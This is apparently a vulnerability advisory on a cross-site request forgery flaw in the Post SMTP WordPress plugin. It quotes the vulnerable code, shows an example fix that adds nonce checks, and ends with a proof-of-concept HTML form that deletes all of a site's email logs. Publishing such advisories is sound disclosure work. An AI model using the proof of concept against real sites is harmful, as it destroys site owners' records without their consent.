Cross-Site Request Forgery (CSRF) Vulnerability in Post SMTP
As part of the security review of the Post SMTP plugin that we did after it was selected for a review by our customers, we found that the plugin contains a cross-site request forgery (CSRF) vulnerability that allows an attacker to cause all of the plugin’s email logs to be deleted.
The plugin’s Email Log admin page is accessible to users with the plugin’s MANAGE_POSTMAN_CAPABILITY_LOGS capability:
$page = add_submenu_page( PostmanViewController::POSTMAN_MENU_SLUG, $pageTitle, $pluginName, Postman::MANAGE_POSTMAN_CAPABILITY_LOGS, 'postman_email_log', array( $this, 'postman_render_email_page' ) );
By default only Administrators have that capability.
When accessing that page the function postman_render_email_page() is called, which in turn calls the function prepare_items():
function postman_render_email_page() {
    // Create an instance of our package class...
    $testListTable = new PostmanEmailLogView();

    wp_enqueue_script( 'postman_resend_email_script' );

    // Fetch, prepare, sort, and filter our data...
    $testListTable->prepare_items();
In that function, if the POST input “postman_trash_all” is set, every stored log entry is permanently deleted (wp_delete_post() is called with its second argument set to true, so the entries bypass the trash and cannot be restored):
if ( isset( $_POST['postman_trash_all'] ) ) {
    foreach ( $posts->posts as $post ) {
        wp_delete_post( $post->ID, true );
No nonce check is performed before that happens (there is no call to check_admin_referer() or wp_verify_nonce()), so an attacker who gets a logged-in Administrator to submit a form from a page the attacker controls can trigger the deletion without the Administrator intending it. The standard WordPress fix is to emit a nonce with the form (wp_nonce_field()) and verify it in the handler before anything is deleted.
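As an added example (not the plugin’s own code and not the developer’s fix), the following shows what the form and its handler look like with the missing nonce check in place. The function names example_render_trash_all_form() and example_handle_trash_all() are hypothetical; the form action, the POST field name and the capability constant are the ones from the plugin code quoted above.

```php
<?php
// Added example, not the plugin's own code or the vendor's fix.
// The form carries a nonce tied to the action "postman_trash_all", and the
// handler verifies that nonce (and the capability) before deleting anything.

// Renders the "Delete All Logs" form on the Email Log page (hypothetical name).
function example_render_trash_all_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=postman_email_log' ) ); ?>">
        <?php
        // Emits a hidden field "postman_trash_all_nonce" bound to this user's
        // session; an attacker's cross-site form cannot know its value.
        wp_nonce_field( 'postman_trash_all', 'postman_trash_all_nonce' );
        ?>
        <input type="hidden" name="postman_trash_all" value="1" />
        <?php submit_button( __( 'Delete All Logs', 'post-smtp' ), 'delete' ); ?>
    </form>
    <?php
}

// Handles the POST from the form above (hypothetical name). $posts is the
// WP_Query result holding the log entries, as in the plugin's prepare_items().
// Returns the number of entries deleted.
function example_handle_trash_all( $posts ) {
    if ( ! isset( $_POST['postman_trash_all'] ) ) {
        return 0;
    }

    // Capability check in the handler itself, rather than relying only on the
    // menu registration that gates the page.
    if ( ! current_user_can( Postman::MANAGE_POSTMAN_CAPABILITY_LOGS ) ) {
        wp_die( esc_html__( 'You are not allowed to delete the email logs.', 'post-smtp' ), 403 );
    }

    // Nonce check: check_admin_referer() calls wp_die() when the nonce is
    // missing or invalid, so a forged cross-site request never reaches the
    // deletion loop below.
    check_admin_referer( 'postman_trash_all', 'postman_trash_all_nonce' );

    $deleted = 0;
    foreach ( $posts->posts as $post ) {
        if ( wp_delete_post( $post->ID, true ) ) {
            $deleted++;
        }
    }
    return $deleted;
}
```

With this change the proof of concept below still submits a POST containing postman_trash_all, but without a valid postman_trash_all_nonce the request stops at check_admin_referer() and no log entry is deleted. The nonce only protects against forged requests; a user who legitimately holds the capability can of course still delete the logs.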
Proof of Concept
The following proof of concept will delete all of the email logging.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=postman_email_log" method="POST">
<input type="hidden" name="postman_trash_all" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Timeline
8/5/2019 – Developer notified.